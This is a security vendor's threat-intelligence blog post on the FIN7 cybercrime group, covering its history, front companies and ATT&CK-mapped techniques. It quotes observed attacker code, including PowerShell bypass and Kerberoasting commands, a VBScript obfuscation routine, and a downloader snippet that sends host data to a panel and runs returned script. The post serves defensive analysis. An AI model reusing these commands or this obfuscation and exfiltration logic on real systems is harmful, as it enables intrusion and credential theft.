Free Trial
|
Login
Free Trial
Login
Platform
Platform
I want to
report
WHITEPAPER Picus Red Report 2025
white paper
DATASHEET Security Validation Platform
Use Cases
Use Cases
Frameworks
Industry
Group
WHITEPAPER Building a Robust Defense-in-Depth Strategy with Breach and Attack Simulation (BAS)
Paper Icons
E-BOOK An Introduction to Exposure Validation
Research
RESEARCH
LEARNING
whitepaper
Whitepaper Modernize Your SOC with Breach and Attack Simulation
report (1)
REPORT Blue Report: Effective Threat Exposure Management
Resources
RESOURCES
LEARNING
Group
WHITEPAPER Double Your Threat Blocking in 90 Days
Paper Icons
E-BOOK An Introduction to Exposure Validation
Company
COMPANY
PARTNERS
webinar
WATCH ON-DEMAND: The BAS Summit: Redefining Attack Simulation through AI
Data sheet
DATASHEET The Pioneer of Breach & Attack Simulation
GET A DEMO
Picus Labs | 10 MIN READ

CREATED ON October 24, 2025

FIN7 Cybercrime Group: Evolution from POS Attacks to Ransomware-as-a-Service (RaaS) Operations

FIN7 — also tracked under the names Carbon Spider and GOLD NIAGARA — is a financially motivated cybercriminal organization that first came to prominence in 2013 [1]. Its driving objective has consistently been monetary profit, and across more than a decade, the group has repeatedly adapted its methods and business model to maximize returns while reducing exposure.

In its earlier years, FIN7 concentrated on large-scale intrusions designed to harvest payment card data. The group targeted Point‑of‑Sale (POS) systems at scale, focusing heavily on sectors where card-present transactions are common — principally the restaurant, financial services, and hospitality industries within the United States. These campaigns were characterized by broad targeting and the capture of payment card information from many infected POS terminals, with the intent of monetizing card data on underground markets.

A hallmark of FIN7's operations is technical sophistication. Over time, the group adopted and refined multi‑stage infection chains and fileless execution techniques that make detection and forensic analysis more difficult. Rather than relying solely on disk-resident payloads, FIN7 frequently employed scripting and in‑memory execution to reduce forensic artifacts. The group's toolset has included PowerShell, JavaScript, and VBScript — used in various stages of an intrusion to download, assemble, or execute code directly in memory. These approaches allowed FIN7 to maintain persistence and move laterally while attempting to evade traditional signature‑based defenses and reduce obvious traces on compromised hosts.

Around 2020, FIN7's operational posture shifted from wide, opportunistic compromises of POS systems toward targeting larger, higher-value organizations — a pattern often called "big‑game hunting." In line with this strategic pivot, FIN7 moved into the Ransomware‑as‑a‑Service (RaaS) ecosystem [1].

To support and scale its technical efforts, FIN7 established fraudulent cybersecurity firms — most notably entities using the names Combi Security and Bastion Secure. These sham companies were used as a cover to recruit legitimate‑appearing security professionals, including penetration testers. Recruits were often unaware of the ultimate malicious purpose; under the guise of legitimate contracting, they produced tools, conducted assessments, or developed capabilities that directly supported the criminal campaigns. This approach allowed FIN7 to effectively leverage real-world security talent and tooling while maintaining layers of plausible deniability and operational separation from the criminal acts their recruits were enabling.

In this post, we'll analyze FIN7's operational playbook, review its most significant intrusions, and dissect the tactics it employs.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

History & Major Activities of FIN7 Group

  • February 2017 - FIN7 engaged in a spearphishing campaign of company employees involved with United States Securities and Exchange Commission (SEC) filings [6].

  • 1 August 2018 - The U.S. Department of Justice announced the indictment of three high-ranking members of FIN7, providing details on the group's structure, roles, and extensive campaigns that compromised thousands of POS systems [2].

  • 2020 - The group shifted its primary focus from POS data theft to "big game hunting," conducting post-intrusion ransomware attacks against large enterprises [1].

  • October 2021 - Researchers exposed FIN7's use of a front company named "Bastion Secure" to hire legitimate penetration testers and IT specialists, who were then unknowingly assigned to conduct the group's ransomware operations [3].

  • January 2022 - The U.S. Federal Bureau of Investigation (FBI) issued a warning that FIN7 was mailing malicious USB devices, impersonating entities like Amazon and the Department of Health and Human Services, to U.S. companies to install ransomware [4].

ATT&CK Mapping (TTPs) of FIN7 Group

Tactic: Initial Access

T1195.002 Supply Chain Compromise: Compromise Software Supply Chain

FIN7 compromised a digital products website, replaced its download links with ones leading to trojanized Atera installers on an Amazon S3 bucket, and used the tool to deploy POWERPLANT, which is a vast backdoor framework with a broad range of capabilities on victim systems.

T1566.001 Spearphishing Attachment

FIN7 specifically targeted individuals associated with United States Securities and Exchange Commission (SEC) filings, many of whom were publicly named in their organizations' official filings. The attackers spoofed the sender address as EDGAR filings@sec.gov, using a malicious attachment titled "Important_Changes_to_Form10_K.doc" (MD5: d04b6410dddee19adec75f597c52e386) [6].

Tactic: Execution

T1059.001 Command and Scripting Interpreter: PowerShell

FIN7 consistently used PowerShell for on-system execution, launching scripts with execution-policy bypass flags directly via PowerShell.exe. Observed command-line patterns include:

powershell.exe -ex bypass -file C:\windows\temp\fdddu32.ps1

powershell.exe -ex bypass -f c:\users\public\temp\AC-Win10w-x64.ps1
powershell.exe -ex bypass -f cube.ps1

 

These specific parameter combinations (-ex bypass with -f or -file) exhibit very low prevalence outside FIN7-attributed activity. 

FIN7 frequently launched PowerShell via cmd.exe wrappers to run scripts with non-interactive/no-profile flags and execution-policy bypass. Observed invocations include [5] :

cmd.exe /c start %SYSTEMROOT%\system32\WindowsPowerShell\v1.0\powershell.exe -noni -nop -exe bypass -f <REDACTED>/ADMIN$/temp/wO9EBGmDqwdc.ps1

cmd.exe /c start %SYSTEMROOT%\system32\WindowsPowerShell\v1.0\powershell.exe -noni -nop -exe bypass -f \\<REDACTED>\Admin$\c5k3fsys.3bp.ps1

T1059.005 Command and Scripting Interpreter: Visual Basic

FIN7 has used Visual Basic Script (VBS) as part of its infection process. In one campaign, the malicious document dropped a VBS script upon execution, and the script installed a PowerShell-based backdoor. The backdoor utilized DNS TXT records for command and control (C2) communications [6].

Tactic: Defense Evasion

T1027.010 Obfuscated Files or Information: Command Obfuscation

A work-in-progress variant of the LOADOUT downloader was submitted to VirusTotal (MD5: 485b2a920f3b5ae7cfad93a4120ec20d) and detected by only a single engine. Two hours later, a new version appeared (MD5: 012e7b4d6b5cb8d46771852c66c71d6d), in which the PowerShell command was concealed using FIN7's custom obfuscation mechanism [5].

PowerShell command before obfuscation:

    objTS.WriteLine(TextCrypt)
    objTS.Close
    pwsh_command = "powershell.exe -executionpolicy bypass -file " & FileName & ".ps1"
    objWSH.Run pwsh_command, 0, True
    FSO.DeleteFile FileName & ".ps1"

PowerShell command after obfuscation:

Text1 = "/3/3.1/2.1,7/2/2.0/3+4+5/4/2*3,7.0,7/2/2.1/4.0,6/3/3.0/3.0+5/4+5-9/4.1+5/4/3*3,7.0,6/3/2*3272327272412292326241618252310112117262125222518252429242516
261416272214202710112212232310"
TextCrypt = Encryption(MakeCryptoText(TextUnShifter(Text1)), False)
    pwsh_command = TextCrypt & FileName & ".ps1"
    objWSH.Run pwsh_command, 0, True
    FSO.DeleteFile FileName & ".ps1"

They were likely evaluating the effectiveness of their custom obfuscation against public repositories to check static detection engine coverage.

They also used custom string obfuscation in commands [5]:

Private Function GetShiftKey()
On Error Resume Next
Set Key = CreateObject("Scripting.Dictionary")

l = Len(CryptoKey
i1 = 0
    With Key
        For i = 1 To l
            s = Mid(CryptoKey, i, 1)
            n = (Asc(s) Mod 8) + 1
            If Not .Exists(n) Then
                .Add n, n
                i1 = i1 + 1
            End If
            If i1 = 9 Then Exit For
        Next
        If i >= l And i1 < 9 Then
            For i = 1 + 1 To 8
                If Not .Exists(i) Then
                    .Add i, i
                End If
            Next
        End If
        For i = 1 To 8
            GetShiftKey = GetShiftKey + .Items()(i)
        Next
    End With
End Function

Private Function TextShifter(txt)
    Dim nKeys(), out()
    Key = GetShiftKey
    n = Len(Key)
    If n = 0 Then Exit Function
    l = Len(txt)
    m = -Int(-l / n)

    ReDim nKeys(n)

    For i = 1 To n
        s1 = Mid(Key, i, 1)
        For j = 1 To n
            s2 = Mid(Key, j, 1)
            If s1 > s2 Or (s1 = s2 And j <= i) Then
                nKeys(i) = nKeys(i) + 1
            End If
        Next
    Next
    ReDim out(n * m)
    For i = 1 To Len(txt)
        out(nKeys((i - 1) Mod n + 1) * m + (i - 1) \ n - m + 1) = Mid(txt, i, 1)
    Next
    TextShifter = Join(out, "")
End Function

T1027.016 Obfuscated Files or Information: Junk Code Insertion

The FIN7 group used a basic but effective obfuscation mechanism — interspersing malicious code with random junk to evade static detections. Below is an example of the group's code, obfuscated in this way [5]:

kiki=ado.ReadText
' OE5QAJ2VaFCK F5
Dim yiups
yiups = "UTo"
WScript.Echo("   error   ")
kok = replace(kiki, "FUCKAV", "")
ulpo = "12"
aoso = year("01/07/12")
if right(aoso, 2) = ulpo then
execute("WScript.Echo(""   file is corrupted   ""):" & kok)
end if
'hello bitchw

To circumvent improved AV detection, the LOADOUT downloader developers tweaked the code that was likely being flagged in detection signatures, inserting the string "FUCKAV" directly into it [5].

data = "id=" & get_id() & "&FUCKAVtype=put" & get_computer_info("") & "&DomainHosts=" & count_domain_hosts() & "&UserName=" & usFUCKAVername & "&LogicalDrives=" & get_grivers() & "&SystemInfo=nothing&SoftwareInfo=nothing&NetworkInfo=nothingFUCKAV&ProcessList=" & get_processlist() & "&DesktopFileList=" & get_desktopfiles() & "&DesktopScreenshFUCKAVot=nothing&WebHistory=nothing&stype=vbs"
response = send(panel_url, data)
if response = "okFUCKAV" then
 js = send(panel_url, "")
 run_js(js)
end ifFUCKAV

Tactic: Credential Access

T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting

FIN7 performed enumeration using a combination of built-in Windows commands, PowerSploit modules, and Kerberoasting PowerShell components.

Specifically, they imported a Kerberoast script and executed the following command to extract service account hashes in HashCat format [5]:

powershell.exe -c Import-Module C:\Users\Public\kerberoast_hex.ps1; Invoke-Kerberoast -OutputFormat HashCat > hash.txt

powershell.exe -ex bypass -c import-module C:\Users\Public\kerberoast_hex.ps1; Invoke-Kerberoast -OutputFormat HashCat

Tactic: Discovery

T1033 System Owner/User Discovery

Adversaries may try to identify the primary user, currently logged-in users, frequent users of a system, or whether a user is actively using it; data gathered during System Owner/User Discovery can shape follow-on behavior. FIN7 used the command below [5] for this purpose, which displays information about users currently logged on to the local or a specified remote system. 

cmd.exe /C quser

T1069.002 Permission Groups Discovery: Domain Groups

Knowledge of domain-level permission groups lets an adversary discover which groups exist and which users belong to them—revealing accounts with elevated privileges (for example, domain administrators); FIN7 tried to determine group membership by running [5]:

cmd.exe /C net group "Domain Admins" /domain

T1218.011 System Binary Proxy Execution: Rundll32

FIN7 invoked RunDll32 to launch TERMITE — a password‑protected shellcode loader to deploy BEACON, Metasploit, and Bughatch payloads — and in this instance, TERMITE loaded and executed a shellcode stager for Cobalt Strike BEACON. The command line was [5]:

RunDll32 TstDll.dll,TstSec 11985756

Tactic: Lateral Movement

T1021.001 Remote Services: Remote Desktop Protocol

FIN7 launched two similar Windows process chains on the target server [5]. They had gained initial access during the intrusion by logging in across two separate days with compromised Remote Desktop Protocol (RDP) credentials.

rdpinit.exe
    ↳ notepad++.exe
        ↳ cmd.exe
            ↳ powershell.exe                       
rdpinit.exe
    ↳ notepad++.exe
        ↳ cmd.exe
            ↳ rundll32.exe

How Picus Simulates FIN7 Attacks?

We also strongly suggest simulating FIN7 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for FIN7:

Threat ID

Threat Name

Attack Module

84033

FIN7 Threat Group Campaign Backdoor Malware Email Threat

Network Infiltration

24726

FIN7 Threat Group Campaign Backdoor Malware Download Threat

Network Infiltration

32970

FIN7 Threat Group Campaign Malware Download Threat - 1

Network Infiltration

25496

FIN7 Threat Group Campaign Downloader Download Threat

Network Infiltration

74671

FIN7 Threat Group Campaign Malware Download Threat - 2

Network Infiltration

92906

FIN7 Threat Group Campaign Malware Email Threat - 2

Network Infiltration

24752

FIN7 Threat Group Campaign Malware Email Threat - 1

Network Infiltration

89876

FIN7 Threat Group Campaign Downloader Email Threat

Network Infiltration

58503

FIN7 Threat Group Campaign

Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Platform.

Aliases of FIN7

FIN7 group is also known as: GOLD NIAGARA, ITG14, Carbon Spider, ELBRUS, Sangria Tempest, Calcium, Navigator, ATK 32, APT-C-11, TAG-CR1, CARBON SPIDER, ATK32, G0046, G0008, Coreid, Carbanak, JokerStash.

References

[1] "FIN7." Accessed: Oct. 14, 2025. [Online]. Available: https://attack.mitre.org/groups/G0046 

[2] "Three Members of Notorious International Cybercrime Group 'Fin7' In Custody for Role in Attacking Over 100 U.S. companies." Accessed: Oct. 14, 2025. [Online]. Available: https://www.justice.gov/archives/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100 

[3] The Hacker News, "Hackers Set Up Fake Company to Get IT Experts to Launch Ransomware Attacks," The Hacker News. Accessed: Oct. 14, 2025. [Online]. Available: https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html 

[4] S. Gatlan, "FBI: Hackers use BadUSB to target defense firms with ransomware," BleepingComputer. Accessed: Oct. 14, 2025. [Online]. Available: https://www.bleepingcomputer.com/news/security/fbi-hackers-use-badusb-to-target-defense-firms-with-ransomware/ 

[5] "FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7," Google Cloud Blog. Accessed: Oct. 14, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7/ 

[6] Accessed: Oct. 14, 2025. [Online]. Available: https://web.archive.org/web/20170316051921/http://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

Table of Contents

Earth Krahang APT Group: Global Government Cyberespionage Campaigns (2022–2024) and TTP Analysis
Emerging Threat Earth Krahang APT Group: Global Government Cyberespionage Campaigns (2022–2024) and TTP Analysis
Learn More
WARMCOOKIE: A Technical Deep Dive into a Persistent Backdoor's Evolution
Emerging Threat WARMCOOKIE: A Technical Deep Dive into a Persistent Backdoor's Evolution
Learn More
Lazarus Group (APT38) Explained: Timeline, TTPs, and Major Attacks
Emerging Threat Lazarus Group (APT38) Explained: Timeline, TTPs, and Major Attacks
Learn More
Scattered LAPSUS$ Hunters: 2025's Most Dangerous Cybercrime Supergroup
Emerging Threat Scattered LAPSUS$ Hunters: 2025's Most Dangerous Cybercrime Supergroup
Learn More
F5 Confirms Breach of Internal Systems—Source Code, Customer Data at Risk
Emerging Threat F5 Confirms Breach of Internal Systems—Source Code, Customer Data at Risk
Learn More
Emerging Threat Oracle EBS CVE-2025-61882 Vulnerability: Pre-auth SSRF Leads to Remote Code Execution
Learn More
Shai-Hulud Worm: Inside the npm Supply Chain Attack
Emerging Threat Shai-Hulud Worm: Inside the npm Supply Chain Attack
Learn More
BRICKSTORM Malware: UNC5221 Targets Tech and Legal Sectors in the United States
Emerging Threat BRICKSTORM Malware: UNC5221 Targets Tech and Legal Sectors in the United States
Learn More
Malicious Listeners in Ivanti EPMM: How CVE-2025-4427 and CVE-2025-4428 Created Backdoors
Emerging Threat Malicious Listeners in Ivanti EPMM: How CVE-2025-4427 and CVE-2025-4428 Created Backdoors
Learn More